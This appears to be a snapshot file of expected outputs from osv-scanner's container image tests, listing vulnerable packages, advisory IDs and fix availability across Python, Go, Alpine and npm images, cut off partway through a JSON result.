+---------+-------------------+---------------+------------+------------------+---------------+ | PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | INTRODUCED LAYER | IN BASE IMAGE | +---------+-------------------+---------------+------------+------------------+---------------+ | pip | 23.0.1 | Fix Available | 3 | # 13 Layer | python | +---------+-------------------+---------------+------------+------------------+---------------+ +------------------------------------------------------------------------------------------------+ | Source:artifact:/usr/local/lib/python3.9/site-packages/setuptools-58.1.0.dist-info/METADATA | +------------+-------------------+---------------+------------+------------------+---------------+ | PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | INTRODUCED LAYER | IN BASE IMAGE | +------------+-------------------+---------------+------------+------------------+---------------+ | setuptools | 58.1.0 | Fix Available | 3 | # 13 Layer | python | +------------+-------------------+---------------+------------+------------------+---------------+ +---------------------------------------------------------------------------------------------+ | Source:artifact:/usr/local/lib/python3.9/site-packages/wheel-0.40.0.dist-info/METADATA | +---------+-------------------+---------------+------------+------------------+---------------+ | PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | INTRODUCED LAYER | IN BASE IMAGE | +---------+-------------------+---------------+------------+------------------+---------------+ | wheel | 0.40.0 | Fix Available | 1 | # 13 Layer | python | +---------+-------------------+---------------+------------+------------------+---------------+ Debian:10 +-----------------------------------------------------------------------------------------------------------------------------------------------+ | Source:os:/var/lib/dpkg/status | 
+------------------------+------------------------+---------------+------------+-----------------------------+------------------+---------------+ | SOURCE PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | BINARY PACKAGES (COUNT) | INTRODUCED LAYER | IN BASE IMAGE | +------------------------+------------------------+---------------+------------+-----------------------------+------------------+---------------+ | debian-archive-keyring | 2019.1+deb10u1 | Fix Available | 1 | debian-archive-keyri... (1) | # 0 Layer | debian | | expat | 2.2.6-2+deb10u6 | Fix Available | 1 | libexpat1 | # 7 Layer | python | | glibc | 2.28-10+deb10u2 | Fix Available | 2 | libc-bin, libc6 | # 0 Layer | debian | | gnutls28 | 3.6.7-4+deb10u10 | Fix Available | 2 | libgnutls30 | # 0 Layer | debian | | ncurses | 6.1+20181013-2+deb10u3 | Fix Available | 2 | libncursesw6... (4) | # 0 Layer | debian | | openssl | 1.1.1n-0+deb10u5 | Fix Available | 1 | libssl1.1, openssl | # 4 Layer | python | | systemd | 241-7~deb10u9 | Fix Available | 1 | libsystemd0... (2) | # 0 Layer | debian | | tar | 1.30+dfsg-6 | Fix Available | 1 | tar | # 0 Layer | debian | | tzdata | 2021a-0+deb10u11 | Fix Available | 2 | tzdata | # 0 Layer | debian | | util-linux | 2.33.1-0.1 | Fix Available | 1 | fdisk, libblkid1... (8) | # 0 Layer | debian | +------------------------+------------------------+---------------+------------+-----------------------------+------------------+---------------+ For the most comprehensive scan results, we recommend using the HTML output: `osv-scanner scan image --serve `. You can also view the full vulnerability list in your terminal with: `osv-scanner scan image --format vertical `. 
--- [TestCommand_OCIImage/Scanning_python_image_with_no_packages - 2] --- [TestCommand_OCIImage/Scanning_python_image_with_some_packages - 1] Scanning local image tarball "./testdata/test-python-full.tar" Container Scanning Result (Debian GNU/Linux 10 (buster)) (Based on "python" image): Total 21 packages affected by 53 known vulnerabilities (1 Critical, 18 High, 16 Medium, 3 Low, 15 Unknown) from 2 ecosystems. 53 vulnerabilities can be fixed. PyPI +---------------------------------------------------------------------------------------------+ | Source:artifact:/usr/local/lib/python3.9/ensurepip/_bundled/pip-23.0.1-py3-none-any.whl | +---------+-------------------+---------------+------------+------------------+---------------+ | PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | INTRODUCED LAYER | IN BASE IMAGE | +---------+-------------------+---------------+------------+------------------+---------------+ | pip | 23.0.1 | Fix Available | 3 | # 7 Layer | python | +---------+-------------------+---------------+------------+------------------+---------------+ +------------------------------------------------------------------------------------------------+ | Source:artifact:/usr/local/lib/python3.9/ensurepip/_bundled/setuptools-58.1.0-py3-none-any.whl | +------------+-------------------+---------------+------------+------------------+---------------+ | PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | INTRODUCED LAYER | IN BASE IMAGE | +------------+-------------------+---------------+------------+------------------+---------------+ | setuptools | 58.1.0 | Fix Available | 3 | # 7 Layer | python | +------------+-------------------+---------------+------------+------------------+---------------+ +---------------------------------------------------------------------------------------------+ | Source:artifact:/usr/local/lib/python3.9/site-packages/Django-1.11.29.dist-info/METADATA | 
+---------+-------------------+---------------+------------+------------------+---------------+ | PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | INTRODUCED LAYER | IN BASE IMAGE | +---------+-------------------+---------------+------------+------------------+---------------+ | django | 1.11.29 | Fix Available | 7 | # 17 Layer | -- | +---------+-------------------+---------------+------------+------------------+---------------+ +---------------------------------------------------------------------------------------------+ | Source:artifact:/usr/local/lib/python3.9/site-packages/Flask-0.12.2.dist-info/METADATA | +---------+-------------------+---------------+------------+------------------+---------------+ | PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | INTRODUCED LAYER | IN BASE IMAGE | +---------+-------------------+---------------+------------+------------------+---------------+ | flask | 0.12.2 | Fix Available | 4 | # 17 Layer | -- | +---------+-------------------+---------------+------------+------------------+---------------+ +---------------------------------------------------------------------------------------------+ | Source:artifact:/usr/local/lib/python3.9/site-packages/idna-2.7.dist-info/METADATA | +---------+-------------------+---------------+------------+------------------+---------------+ | PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | INTRODUCED LAYER | IN BASE IMAGE | +---------+-------------------+---------------+------------+------------------+---------------+ | idna | 2.7 | Fix Available | 1 | # 17 Layer | -- | +---------+-------------------+---------------+------------+------------------+---------------+ +---------------------------------------------------------------------------------------------+ | Source:artifact:/usr/local/lib/python3.9/site-packages/pip-23.0.1.dist-info/METADATA | +---------+-------------------+---------------+------------+------------------+---------------+ | PACKAGE | INSTALLED 
VERSION | FIX AVAILABLE | VULN COUNT | INTRODUCED LAYER | IN BASE IMAGE | +---------+-------------------+---------------+------------+------------------+---------------+ | pip | 23.0.1 | Fix Available | 3 | # 13 Layer | python | +---------+-------------------+---------------+------------+------------------+---------------+ +----------------------------------------------------------------------------------------------+ | Source:artifact:/usr/local/lib/python3.9/site-packages/requests-2.20.0.dist-info/METADATA | +----------+-------------------+---------------+------------+------------------+---------------+ | PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | INTRODUCED LAYER | IN BASE IMAGE | +----------+-------------------+---------------+------------+------------------+---------------+ | requests | 2.20.0 | Fix Available | 3 | # 17 Layer | -- | +----------+-------------------+---------------+------------+------------------+---------------+ +------------------------------------------------------------------------------------------------+ | Source:artifact:/usr/local/lib/python3.9/site-packages/setuptools-58.1.0.dist-info/METADATA | +------------+-------------------+---------------+------------+------------------+---------------+ | PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | INTRODUCED LAYER | IN BASE IMAGE | +------------+-------------------+---------------+------------+------------------+---------------+ | setuptools | 58.1.0 | Fix Available | 3 | # 13 Layer | python | +------------+-------------------+---------------+------------+------------------+---------------+ +---------------------------------------------------------------------------------------------+ | Source:artifact:/usr/local/lib/python3.9/site-packages/urllib3-1.24.3.dist-info/METADATA | +---------+-------------------+---------------+------------+------------------+---------------+ | PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | INTRODUCED LAYER | IN BASE IMAGE | 
+---------+-------------------+---------------+------------+------------------+---------------+ | urllib3 | 1.24.3 | Fix Available | 9 | # 17 Layer | -- | +---------+-------------------+---------------+------------+------------------+---------------+ +----------------------------------------------------------------------------------------------+ | Source:artifact:/usr/local/lib/python3.9/site-packages/werkzeug-3.1.4.dist-info/METADATA | +----------+-------------------+---------------+------------+------------------+---------------+ | PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | INTRODUCED LAYER | IN BASE IMAGE | +----------+-------------------+---------------+------------+------------------+---------------+ | werkzeug | 3.1.4 | Fix Available | 2 | # 17 Layer | -- | +----------+-------------------+---------------+------------+------------------+---------------+ +---------------------------------------------------------------------------------------------+ | Source:artifact:/usr/local/lib/python3.9/site-packages/wheel-0.40.0.dist-info/METADATA | +---------+-------------------+---------------+------------+------------------+---------------+ | PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | INTRODUCED LAYER | IN BASE IMAGE | +---------+-------------------+---------------+------------+------------------+---------------+ | wheel | 0.40.0 | Fix Available | 1 | # 13 Layer | python | +---------+-------------------+---------------+------------+------------------+---------------+ Debian:10 +-----------------------------------------------------------------------------------------------------------------------------------------------+ | Source:os:/var/lib/dpkg/status | +------------------------+------------------------+---------------+------------+-----------------------------+------------------+---------------+ | SOURCE PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | BINARY PACKAGES (COUNT) | INTRODUCED LAYER | IN BASE IMAGE | 
+------------------------+------------------------+---------------+------------+-----------------------------+------------------+---------------+ | debian-archive-keyring | 2019.1+deb10u1 | Fix Available | 1 | debian-archive-keyri... (1) | # 0 Layer | debian | | expat | 2.2.6-2+deb10u6 | Fix Available | 1 | libexpat1 | # 7 Layer | python | | glibc | 2.28-10+deb10u2 | Fix Available | 2 | libc-bin, libc6 | # 0 Layer | debian | | gnutls28 | 3.6.7-4+deb10u10 | Fix Available | 2 | libgnutls30 | # 0 Layer | debian | | ncurses | 6.1+20181013-2+deb10u3 | Fix Available | 2 | libncursesw6... (4) | # 0 Layer | debian | | openssl | 1.1.1n-0+deb10u5 | Fix Available | 1 | libssl1.1, openssl | # 4 Layer | python | | systemd | 241-7~deb10u9 | Fix Available | 1 | libsystemd0... (2) | # 0 Layer | debian | | tar | 1.30+dfsg-6 | Fix Available | 1 | tar | # 0 Layer | debian | | tzdata | 2021a-0+deb10u11 | Fix Available | 2 | tzdata | # 0 Layer | debian | | util-linux | 2.33.1-0.1 | Fix Available | 1 | fdisk, libblkid1... (8) | # 0 Layer | debian | +------------------------+------------------------+---------------+------------+-----------------------------+------------------+---------------+ For the most comprehensive scan results, we recommend using the HTML output: `osv-scanner scan image --serve `. You can also view the full vulnerability list in your terminal with: `osv-scanner scan image --format vertical `. --- [TestCommand_OCIImage/Scanning_python_image_with_some_packages - 2] --- [TestCommand_OCIImage/scanning_image_with_go_binary - 1] Scanning local image tarball "./testdata/test-package-tracing.tar" Container Scanning Result (Alpine Linux v3.20) (Based on "alpine" image): Total 9 packages affected by 213 known vulnerabilities (2 Critical, 6 High, 11 Medium, 2 Low, 192 Unknown) from 2 ecosystems. 213 vulnerabilities can be fixed. 
Go +---------------------------------------------------------------------------------------------+ | Source:artifact:/go/bin/more-vuln-overwrite-less-vuln | +---------+-------------------+---------------+------------+------------------+---------------+ | PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | INTRODUCED LAYER | IN BASE IMAGE | +---------+-------------------+---------------+------------+------------------+---------------+ | stdlib | 1.22.4 | Fix Available | 32 | # 9 Layer | -- | +---------+-------------------+---------------+------------+------------------+---------------+ +---------------------------------------------------------------------------------------------+ | Source:artifact:/go/bin/ptf-1.2.0 | +---------+-------------------+---------------+------------+------------------+---------------+ | PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | INTRODUCED LAYER | IN BASE IMAGE | +---------+-------------------+---------------+------------+------------------+---------------+ | stdlib | 1.22.4 | Fix Available | 32 | # 2 Layer | -- | +---------+-------------------+---------------+------------+------------------+---------------+ +---------------------------------------------------------------------------------------------+ | Source:artifact:/go/bin/ptf-1.3.0 | +---------+-------------------+---------------+------------+------------------+---------------+ | PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | INTRODUCED LAYER | IN BASE IMAGE | +---------+-------------------+---------------+------------+------------------+---------------+ | stdlib | 1.22.4 | Fix Available | 32 | # 4 Layer | -- | +---------+-------------------+---------------+------------+------------------+---------------+ +---------------------------------------------------------------------------------------------+ | Source:artifact:/go/bin/ptf-1.3.0-moved | +---------+-------------------+---------------+------------+------------------+---------------+ | PACKAGE | 
INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | INTRODUCED LAYER | IN BASE IMAGE | +---------+-------------------+---------------+------------+------------------+---------------+ | stdlib | 1.22.4 | Fix Available | 32 | # 3 Layer | -- | +---------+-------------------+---------------+------------+------------------+---------------+ +---------------------------------------------------------------------------------------------+ | Source:artifact:/go/bin/ptf-1.4.0 | +---------+-------------------+---------------+------------+------------------+---------------+ | PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | INTRODUCED LAYER | IN BASE IMAGE | +---------+-------------------+---------------+------------+------------------+---------------+ | stdlib | 1.22.4 | Fix Available | 32 | # 2 Layer | -- | +---------+-------------------+---------------+------------+------------------+---------------+ +---------------------------------------------------------------------------------------------+ | Source:artifact:/go/bin/ptf-vulnerable | +---------+-------------------+---------------+------------+------------------+---------------+ | PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | INTRODUCED LAYER | IN BASE IMAGE | +---------+-------------------+---------------+------------+------------------+---------------+ | stdlib | 1.22.4 | Fix Available | 32 | # 7 Layer | -- | +---------+-------------------+---------------+------------+------------------+---------------+ Alpine:v3.20 +------------------------------------------------------------------------------------------------------------------------------+ | Source:os:/lib/apk/db/installed | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ | SOURCE PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | BINARY PACKAGES (COUNT) | INTRODUCED LAYER | IN BASE IMAGE | 
+----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ | busybox | 1.36.1-r29 | Fix Available | 2 | busybox... (3) | # 0 Layer | alpine | | musl | 1.2.5-r0 | Fix Available | 1 | musl, musl-utils | # 0 Layer | alpine | | openssl | 3.3.1-r0 | Fix Available | 18 | libcrypto3, libssl3 | # 0 Layer | alpine | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ For the most comprehensive scan results, we recommend using the HTML output: `osv-scanner scan image --serve `. You can also view the full vulnerability list in your terminal with: `osv-scanner scan image --format vertical `. --- [TestCommand_OCIImage/scanning_image_with_go_binary - 2] --- [TestCommand_OCIImage/scanning_insecure_alpine_image_with_detector_preset - 1] Scanning local image tarball "./testdata/test-alpine-etcshadow.tar" Container Scanning Result (Alpine Linux v3.10) (Based on "alpine" image): Total 1 package affected by 1 known vulnerability (1 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 1 vulnerability can be fixed. 
Alpine:v3.10 +------------------------------------------------------------------------------------------------------------------------------+ | Source:os:/lib/apk/db/installed | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ | SOURCE PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | BINARY PACKAGES (COUNT) | INTRODUCED LAYER | IN BASE IMAGE | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ | apk-tools | 2.10.6-r0 | Fix Available | 1 | apk-tools | # 0 Layer | alpine | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ For the most comprehensive scan results, we recommend using the HTML output: `osv-scanner scan image --serve `. You can also view the full vulnerability list in your terminal with: `osv-scanner scan image --format vertical `. --- [TestCommand_OCIImage/scanning_insecure_alpine_image_with_detector_preset - 2] --- [TestCommand_OCIImage/scanning_insecure_alpine_image_with_specific_detector_disabled - 1] Scanning local image tarball "./testdata/test-alpine-etcshadow.tar" Container Scanning Result (Alpine Linux v3.10) (Based on "alpine" image): Total 1 package affected by 1 known vulnerability (1 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 1 vulnerability can be fixed. 
Alpine:v3.10 +------------------------------------------------------------------------------------------------------------------------------+ | Source:os:/lib/apk/db/installed | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ | SOURCE PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | BINARY PACKAGES (COUNT) | INTRODUCED LAYER | IN BASE IMAGE | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ | apk-tools | 2.10.6-r0 | Fix Available | 1 | apk-tools | # 0 Layer | alpine | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ For the most comprehensive scan results, we recommend using the HTML output: `osv-scanner scan image --serve `. You can also view the full vulnerability list in your terminal with: `osv-scanner scan image --format vertical `. --- [TestCommand_OCIImage/scanning_insecure_alpine_image_with_specific_detector_disabled - 2] --- [TestCommand_OCIImage/scanning_insecure_alpine_image_with_specific_detector_enabled - 1] Scanning local image tarball "./testdata/test-alpine-etcshadow.tar" Container Scanning Result (Alpine Linux v3.10) (Based on "alpine" image): Total 1 package affected by 1 known vulnerability (1 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 1 vulnerability can be fixed. 
Alpine:v3.10 +------------------------------------------------------------------------------------------------------------------------------+ | Source:os:/lib/apk/db/installed | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ | SOURCE PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | BINARY PACKAGES (COUNT) | INTRODUCED LAYER | IN BASE IMAGE | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ | apk-tools | 2.10.6-r0 | Fix Available | 1 | apk-tools | # 0 Layer | alpine | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ For the most comprehensive scan results, we recommend using the HTML output: `osv-scanner scan image --serve `. You can also view the full vulnerability list in your terminal with: `osv-scanner scan image --format vertical `. --- [TestCommand_OCIImage/scanning_insecure_alpine_image_with_specific_detector_enabled - 2] --- [TestCommand_OCIImage/scanning_insecure_alpine_image_without_detectors - 1] Scanning local image tarball "./testdata/test-alpine-etcshadow.tar" Container Scanning Result (Alpine Linux v3.10) (Based on "alpine" image): Total 1 package affected by 1 known vulnerability (1 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 1 vulnerability can be fixed. 
Alpine:v3.10 +------------------------------------------------------------------------------------------------------------------------------+ | Source:os:/lib/apk/db/installed | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ | SOURCE PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | BINARY PACKAGES (COUNT) | INTRODUCED LAYER | IN BASE IMAGE | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ | apk-tools | 2.10.6-r0 | Fix Available | 1 | apk-tools | # 0 Layer | alpine | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ For the most comprehensive scan results, we recommend using the HTML output: `osv-scanner scan image --serve `. You can also view the full vulnerability list in your terminal with: `osv-scanner scan image --format vertical `. --- [TestCommand_OCIImage/scanning_insecure_alpine_image_without_detectors - 2] --- [TestCommand_OCIImage/scanning_node_modules_using_npm_with_no_packages - 1] Scanning local image tarball "./testdata/test-node_modules-npm-empty.tar" Container Scanning Result (Alpine Linux v3.19) (Based on "library/node" image): Total 2 packages affected by 15 known vulnerabilities (1 Critical, 3 High, 9 Medium, 2 Low, 0 Unknown) from 1 ecosystem. 15 vulnerabilities can be fixed. 
Alpine:v3.19 +------------------------------------------------------------------------------------------------------------------------------+ | Source:os:/lib/apk/db/installed | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ | SOURCE PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | BINARY PACKAGES (COUNT) | INTRODUCED LAYER | IN BASE IMAGE | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ | busybox | 1.36.1-r15 | Fix Available | 6 | busybox... (3) | # 0 Layer | alpine | | openssl | 3.1.4-r5 | Fix Available | 9 | libcrypto3, libssl3 | # 0 Layer | alpine | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ For the most comprehensive scan results, we recommend using the HTML output: `osv-scanner scan image --serve `. You can also view the full vulnerability list in your terminal with: `osv-scanner scan image --format vertical `. --- [TestCommand_OCIImage/scanning_node_modules_using_npm_with_no_packages - 2] --- [TestCommand_OCIImage/scanning_node_modules_using_npm_with_some_packages - 1] Scanning local image tarball "./testdata/test-node_modules-npm-full.tar" Container Scanning Result (Alpine Linux v3.19) (Based on "library/node" image): Total 4 packages affected by 18 known vulnerabilities (3 Critical, 3 High, 10 Medium, 2 Low, 0 Unknown) from 2 ecosystems. 17 vulnerabilities can be fixed. 
npm +-------------------------------------------------------------------------------------------------+ | Source:artifact:/prod/app/node_modules/.package-lock.json | +----------+-------------------+------------------+------------+------------------+---------------+ | PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | INTRODUCED LAYER | IN BASE IMAGE | +----------+-------------------+------------------+------------+------------------+---------------+ | cryo | 0.0.6 | No fix available | 1 | # 14 Layer | -- | | minimist | 0.0.8 | Fix Available | 2 | # 13 Layer | -- | +----------+-------------------+------------------+------------+------------------+---------------+ Alpine:v3.19 +------------------------------------------------------------------------------------------------------------------------------+ | Source:os:/lib/apk/db/installed | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ | SOURCE PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | BINARY PACKAGES (COUNT) | INTRODUCED LAYER | IN BASE IMAGE | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ | busybox | 1.36.1-r15 | Fix Available | 6 | busybox... (3) | # 0 Layer | alpine | | openssl | 3.1.4-r5 | Fix Available | 9 | libcrypto3, libssl3 | # 0 Layer | alpine | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ For the most comprehensive scan results, we recommend using the HTML output: `osv-scanner scan image --serve `. You can also view the full vulnerability list in your terminal with: `osv-scanner scan image --format vertical `. 
--- [TestCommand_OCIImage/scanning_node_modules_using_npm_with_some_packages - 2] --- [TestCommand_OCIImage/scanning_node_modules_using_pnpm_with_no_packages - 1] Scanning local image tarball "./testdata/test-node_modules-pnpm-empty.tar" Container Scanning Result (Alpine Linux v3.19) (Based on "library/node" image): Total 2 packages affected by 15 known vulnerabilities (1 Critical, 3 High, 9 Medium, 2 Low, 0 Unknown) from 1 ecosystem. 15 vulnerabilities can be fixed. Alpine:v3.19 +------------------------------------------------------------------------------------------------------------------------------+ | Source:os:/lib/apk/db/installed | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ | SOURCE PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | BINARY PACKAGES (COUNT) | INTRODUCED LAYER | IN BASE IMAGE | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ | busybox | 1.36.1-r15 | Fix Available | 6 | busybox... (3) | # 0 Layer | alpine | | openssl | 3.1.4-r5 | Fix Available | 9 | libcrypto3, libssl3 | # 0 Layer | alpine | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ For the most comprehensive scan results, we recommend using the HTML output: `osv-scanner scan image --serve `. You can also view the full vulnerability list in your terminal with: `osv-scanner scan image --format vertical `. --- [TestCommand_OCIImage/scanning_node_modules_using_pnpm_with_no_packages - 2] --- [TestCommand_OCIImage/scanning_node_modules_using_pnpm_with_some_packages - 1] Scanning local image tarball "./testdata/test-node_modules-pnpm-full.tar" Container Scanning Result (Alpine Linux v3.19) (Based on "library/node" image): Total 2 packages affected by 15 known vulnerabilities (1 Critical, 3 High, 9 Medium, 2 Low, 0 Unknown) from 1 ecosystem. 
15 vulnerabilities can be fixed. Alpine:v3.19 +------------------------------------------------------------------------------------------------------------------------------+ | Source:os:/lib/apk/db/installed | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ | SOURCE PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | BINARY PACKAGES (COUNT) | INTRODUCED LAYER | IN BASE IMAGE | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ | busybox | 1.36.1-r15 | Fix Available | 6 | busybox... (3) | # 0 Layer | alpine | | openssl | 3.1.4-r5 | Fix Available | 9 | libcrypto3, libssl3 | # 0 Layer | alpine | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ For the most comprehensive scan results, we recommend using the HTML output: `osv-scanner scan image --serve `. You can also view the full vulnerability list in your terminal with: `osv-scanner scan image --format vertical `. --- [TestCommand_OCIImage/scanning_node_modules_using_pnpm_with_some_packages - 2] --- [TestCommand_OCIImage/scanning_node_modules_using_yarn_with_no_packages - 1] Scanning local image tarball "./testdata/test-node_modules-yarn-empty.tar" Container Scanning Result (Alpine Linux v3.19) (Based on "library/node" image): Total 2 packages affected by 15 known vulnerabilities (1 Critical, 3 High, 9 Medium, 2 Low, 0 Unknown) from 1 ecosystem. 15 vulnerabilities can be fixed. 
Alpine:v3.19 +------------------------------------------------------------------------------------------------------------------------------+ | Source:os:/lib/apk/db/installed | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ | SOURCE PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | BINARY PACKAGES (COUNT) | INTRODUCED LAYER | IN BASE IMAGE | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ | busybox | 1.36.1-r15 | Fix Available | 6 | busybox... (3) | # 0 Layer | alpine | | openssl | 3.1.4-r5 | Fix Available | 9 | libcrypto3, libssl3 | # 0 Layer | alpine | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ For the most comprehensive scan results, we recommend using the HTML output: `osv-scanner scan image --serve `. You can also view the full vulnerability list in your terminal with: `osv-scanner scan image --format vertical `. --- [TestCommand_OCIImage/scanning_node_modules_using_yarn_with_no_packages - 2] --- [TestCommand_OCIImage/scanning_node_modules_using_yarn_with_some_packages - 1] Scanning local image tarball "./testdata/test-node_modules-yarn-full.tar" Container Scanning Result (Alpine Linux v3.19) (Based on "library/node" image): Total 2 packages affected by 15 known vulnerabilities (1 Critical, 3 High, 9 Medium, 2 Low, 0 Unknown) from 1 ecosystem. 15 vulnerabilities can be fixed. 
Alpine:v3.19 +------------------------------------------------------------------------------------------------------------------------------+ | Source:os:/lib/apk/db/installed | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ | SOURCE PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | BINARY PACKAGES (COUNT) | INTRODUCED LAYER | IN BASE IMAGE | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ | busybox | 1.36.1-r15 | Fix Available | 6 | busybox... (3) | # 0 Layer | alpine | | openssl | 3.1.4-r5 | Fix Available | 9 | libcrypto3, libssl3 | # 0 Layer | alpine | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ For the most comprehensive scan results, we recommend using the HTML output: `osv-scanner scan image --serve `. You can also view the full vulnerability list in your terminal with: `osv-scanner scan image --format vertical `. 
--- [TestCommand_OCIImage/scanning_node_modules_using_yarn_with_some_packages - 2] --- [TestCommand_OCIImage_JSONFormat/Scanning_python_image_with_some_packages - 1] { "results": [ { "source": { "path": "/usr/local/lib/python3.9/ensurepip/_bundled/pip-23.0.1-py3-none-any.whl", "type": "artifact" }, "packages": [ { "package": { "name": "pip", "version": "23.0.1", "ecosystem": "PyPI", "image_origin_details": { "index": 7 } }, "groups": 3, "vulnerabilities": [ "PYSEC-2023-228", "GHSA-4xh5-x5gv-qwph", "GHSA-6vgw-5pg2-w6jp", "GHSA-mq26-g339-26xf" ] } ] }, { "source": { "path": "/usr/local/lib/python3.9/ensurepip/_bundled/setuptools-58.1.0-py3-none-any.whl", "type": "artifact" }, "packages": [ { "package": { "name": "setuptools", "version": "58.1.0", "ecosystem": "PyPI", "image_origin_details": { "index": 7 } }, "groups": 3, "vulnerabilities": [ "PYSEC-2022-43012", "PYSEC-2025-49", "GHSA-5rjg-fvgr-3xxf", "GHSA-cx63-2mw6-8hw5", "GHSA-r9hx-vwmv-q579" ] } ] }, { "source": { "path": "/usr/local/lib/python3.9/site-packages/Django-1.11.29.dist-info/METADATA", "type": "artifact" }, "packages": [ { "package": { "name": "django", "version": "1.11.29", "ecosystem": "PyPI", "image_origin_details": { "index": 17 } }, "groups": 7, "vulnerabilities": [ "PYSEC-2021-98", "GHSA-68w8-qjq3-2gfm", "GHSA-6w2r-r2m5-xq5w", "GHSA-7xr5-9hcq-chf9", "GHSA-8x94-hmjh-97hq", "GHSA-frmv-pr5f-9mcr", "GHSA-qw25-v68c-qjf3", "GHSA-rrqc-c2jx-6jgv" ] } ] }, { "source": { "path": "/usr/local/lib/python3.9/site-packages/Flask-0.12.2.dist-info/METADATA", "type": "artifact" }, "packages": [ { "package": { "name": "flask", "version": "0.12.2", "ecosystem": "PyPI", "image_origin_details": { "index": 17 } }, "groups": 4, "vulnerabilities": [ "PYSEC-2018-66", "PYSEC-2019-179", "PYSEC-2023-62", "GHSA-562c-5r94-xh97", "GHSA-5wv5-4vpf-pj6m", "GHSA-68rp-wp8r-4726", "GHSA-m2qf-hxjv-5gpq" ] } ] }, { "source": { "path": "/usr/local/lib/python3.9/site-packages/idna-2.7.dist-info/METADATA", "type": "artifact" }, "packages": 
